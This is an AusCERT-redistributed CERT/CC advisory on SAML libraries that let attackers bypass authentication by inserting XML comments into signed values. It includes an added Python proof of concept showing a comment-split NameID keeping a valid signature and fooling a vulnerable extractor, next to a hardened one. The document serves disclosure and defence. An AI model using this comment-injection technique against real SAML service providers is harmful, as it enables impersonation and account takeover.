-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2018.0571
        Multiple SAML libraries may allow authentication bypass via
             incorrect XML canonicalization and DOM traversal
                             28 February 2018

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           python-saml
                   ruby-saml
                   saml2-js
                   omniauth-saml
                   Shibboleth openSAML
Publisher:         CERT/CC
Operating System:  Windows
                   UNIX variants (UNIX, Linux, OSX)
                   Apple iOS
                   Android
Impact/Access:     Access Privileged Data         -- Remote/Unauthenticated
                   Provide Misleading Information -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2018-0489 CVE-2017-11430 CVE-2017-11429
                   CVE-2017-11428 CVE-2017-11427 

Original Bulletin: 
   https://www.kb.cert.org/vuls/id/475445

Comment: This advisory affects multiple libraries implementing SAML, which
         will have different patch schedules.

- --------------------------BEGIN INCLUDED TEXT--------------------

Vulnerability Note VU#475445

Multiple SAML libraries may allow authentication bypass via incorrect XML
canonicalization and DOM traversal

Original Release date: 27 Feb 2018 | Last revised: 27 Feb 2018

Overview

Multiple SAML libraries may incorrectly utilize the results of XML DOM
traversal and canonicalization APIs in such a way that an attacker may be able
to manipulate the SAML data without invalidating the cryptographic signature,
allowing the attacker to potentially bypass authentication to SAML service
providers.

Description

CWE-287: Improper Authentication

Security Assertion Markup Language (SAML) is an XML-based markup language for
security assertions regarding authentication and permissions, most commonly
used for single sign-on (SSO) services.

XML DOM traversal and canonicalization APIs are inconsistent in how they treat
comments inside an XML element. The canonicalization used by XML Signature
strips comments, so the signature covers the element's full inner text on
both sides of a comment. A DOM call that returns only the first child text
node, however, stops at the comment. SAML libraries that extract values such
as the NameID with such a call therefore see only the text before the comment,
while the text after it is silently dropped. Text after a comment thus has no
impact on the signature, but changes the value the service provider reads.
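
The mechanism described above, as an added example that is not part of the
CERT/CC note or of any of the affected libraries' code: a constructed NameID
element is "signed" by the identity provider, the attacker splits its text
with a comment, and the service provider then reads it with a vulnerable
first-text-node extractor and with a hardened one. An HMAC over the
exclusive-C14N form of the element stands in for XML-DSig so the script runs
with Python's standard library alone (Python 3.8 or later for
ElementTree.canonicalize); the namespace, account names and key are
constructed for illustration.

```python
import hashlib
import hmac
import xml.dom.minidom
import xml.etree.ElementTree as ET

# Constructed sample data. The attacker legitimately registered the account
# "user@example.com.evil.com" at the IdP and received an assertion for it.
IDP_KEY = b"constructed-idp-signing-key"
ISSUED = ('<NameID xmlns="urn:oasis:names:tc:SAML:2.0:assertion">'
          'user@example.com.evil.com</NameID>')
# The attacker's copy: an empty comment splits the NameID into two text nodes.
TAMPERED = ('<NameID xmlns="urn:oasis:names:tc:SAML:2.0:assertion">'
            'user@example.com<!---->.evil.com</NameID>')


def c14n(xml_text):
    # Exclusive canonicalization without comments, the form XML Signature
    # typically signs: comments vanish, text on both sides of them stays.
    return ET.canonicalize(xml_text, with_comments=False)


def idp_sign(xml_text):
    # HMAC stands in for the IdP's RSA XML-DSig signature (assumption).
    return hmac.new(IDP_KEY, c14n(xml_text).encode(), hashlib.sha256).hexdigest()


def sp_verify(xml_text, signature):
    # The SP recomputes the signature over the canonical form it receives.
    return hmac.compare_digest(idp_sign(xml_text), signature)


def extract_nameid_vulnerable(xml_text):
    # The pattern behind the CVEs: read only the first child text node.
    # minidom keeps comments as DOM nodes, so this returns the text before
    # the comment and silently drops everything after it.
    node = xml.dom.minidom.parseString(xml_text).documentElement
    return node.firstChild.nodeValue


def extract_nameid_hardened(xml_text):
    # Join every text/CDATA child; comments contribute nothing, which is
    # exactly what the canonicalized, signed content contains.
    node = xml.dom.minidom.parseString(xml_text).documentElement
    return "".join(c.data for c in node.childNodes
                   if c.nodeType in (c.TEXT_NODE, c.CDATA_SECTION_NODE))


def run_attack(extract):
    # Returns the identity the SP would accept for the tampered assertion.
    signature = idp_sign(ISSUED)              # IdP signs the real assertion
    if not sp_verify(TAMPERED, signature):    # the comment does not break it
        raise RuntimeError("signature unexpectedly failed")
    return extract(TAMPERED)


if __name__ == "__main__":
    print("canonical forms identical:", c14n(ISSUED) == c14n(TAMPERED))
    print("vulnerable SP logs in as:", run_attack(extract_nameid_vulnerable))
    print("hardened SP logs in as:  ", run_attack(extract_nameid_hardened))
```

The vulnerable extractor accepts the attacker as user@example.com; the
hardened one yields the account the IdP actually vouched for. The same
check works for any signed element whose text value drives an authorization
decision, not only NameID.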

A remote attacker can modify SAML content for a SAML service provider without
invalidating the cryptographic signature, which may allow attackers to bypass
primary authentication for the affected SAML service provider.

The following CVEs are assigned:

CVE-2017-11427 - OneLogin's "python-saml"
CVE-2017-11428 - OneLogin's "ruby-saml"
CVE-2017-11429 - Clever's "saml2-js"
CVE-2017-11430 - "OmniAuth-SAML"
CVE-2018-0489 - Shibboleth openSAML C++

More information is available in the researcher's blog post. 


Impact

By modifying SAML content without invalidating the cryptographic signature, a
remote, unauthenticated attacker may be able to bypass primary authentication
for an affected SAML service provider.


Solution

Apply updates

Affected SAML service providers should update software to utilize the latest
releases of affected SAML libraries. Please see the vendor list below for more
information.


Vendor Information

Vendor                                   Status       Date         Date
                                                      Notified     Updated
Clever, Inc.                             Affected     24 Jan 2018  26 Feb 2018
Duo Security                             Affected     -            22 Feb 2018
OmniAuth                                 Affected     24 Jan 2018  06 Feb 2018
OneLogin Inc                             Affected     24 Jan 2018  27 Feb 2018
Shibboleth Consortium                    Affected     24 Jan 2018  06 Feb 2018
AssureBridge                             Not Affected -            27 Feb 2018
Okta Inc.                                Not Affected 29 Jan 2018  27 Feb 2018
Box                                      Unknown      23 Feb 2018  23 Feb 2018
Cisco                                    Unknown      23 Feb 2018  23 Feb 2018
Danish e-Infrastructure Cooperation      Unknown      24 Jan 2018  24 Jan 2018
(WAYF)
Entr'ouvert                              Unknown      24 Jan 2018  24 Jan 2018
GitHub                                   Unknown      24 Jan 2018  24 Jan 2018
Google                                   Unknown      23 Feb 2018  23 Feb 2018
Microsoft                                Unknown      23 Feb 2018  23 Feb 2018
Pivotal Software, Inc.                   Unknown      24 Jan 2018  24 Jan 2018

If you are a vendor and your product is affected, let us know.

CVSS Metrics

    Group     Score             Vector
Base          6.3   AV:N/AC:M/Au:S/C:C/I:N/A:N
Temporal      4.9   E:POC/RL:OF/RC:C
Environmental 4.9   CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND

References

  * https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
  * https://duo.com/labs/psa/duo-psa-2017-003
  * https://shibboleth.net/community/advisories/secadv_20180112.txt
  * https://cwe.mitre.org/data/definitions/287.html

Credit

Thanks to Kelby Ludwig of Duo Security for reporting this vulnerability.

This document was written by Garret Wassermann.

Other Information

  * CVE IDs: CVE-2017-11427 CVE-2017-11428 CVE-2017-11429 CVE-2017-11430
    CVE-2018-0489
  * Date Public: 27 Feb 2018
  * Date First Published: 27 Feb 2018
  * Date Last Updated: 27 Feb 2018
  * Document Revision: 67

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBWpYBLox+lLeg9Ub1AQghfA//RJAcK3ftBIqPIuswbbDUHTF82VL6HAlt
k1sjd/waKWDw+WFFWJPwy/roTO5nNKYrdO/1daAQB9DbiUzXpFPe1A/19a9BwCy9
lV/pNL6xWN2d+mZCguyqnSz+efUxab/HBxm301DQdaQ0KgQDlA6szlZAxOPuIkYN
dtNPT/5crmiHW0Nd83Q1j5KPY/K22NnrSIhy6+e93se75kE29tTbRI3s4kB43AM1
J/RncFEXiSPNKolTO+eu1dQfJ1o6lAbLqJ/EHEMgYqQ7QK+htK8uZc7uwPL7BodQ
FA1f8aER01C6TZUIlC7Q4SW1KBURnfdl3+m5Z8HM3hOKmybe03vqY9L5bWvhVLsV
b5LUtDS5A2OU+xFrTm8L6nYcGcriC8AxE29HReP4VvCjuQv28SzSPUhaQPys2eIL
9Q29ZI8WgoQxXujJeiM6BVBqKGdJ0ucy8s6dx6lytrV4my0uqzUPkGixE2Yj6e76
zED0eXbKNAX4yQx10lomnAnEj+zOhvQr5VXy+3Aymb9SDmkVuo8qVqTpNFrqfiOt
2TkZasC5jilaP3hTdujfriuqH8708VHWBXqlIWnxZ0bTU8isRxOxx7hV5Bj02NuQ
2kUoMuSdN3Xp7JlPXmWMaYXtj61EFPS7kV3D10JMbaSG/eYFcHBefJC2bZyexkfQ
sfeP1813XFg=
=5ePt
-----END PGP SIGNATURE-----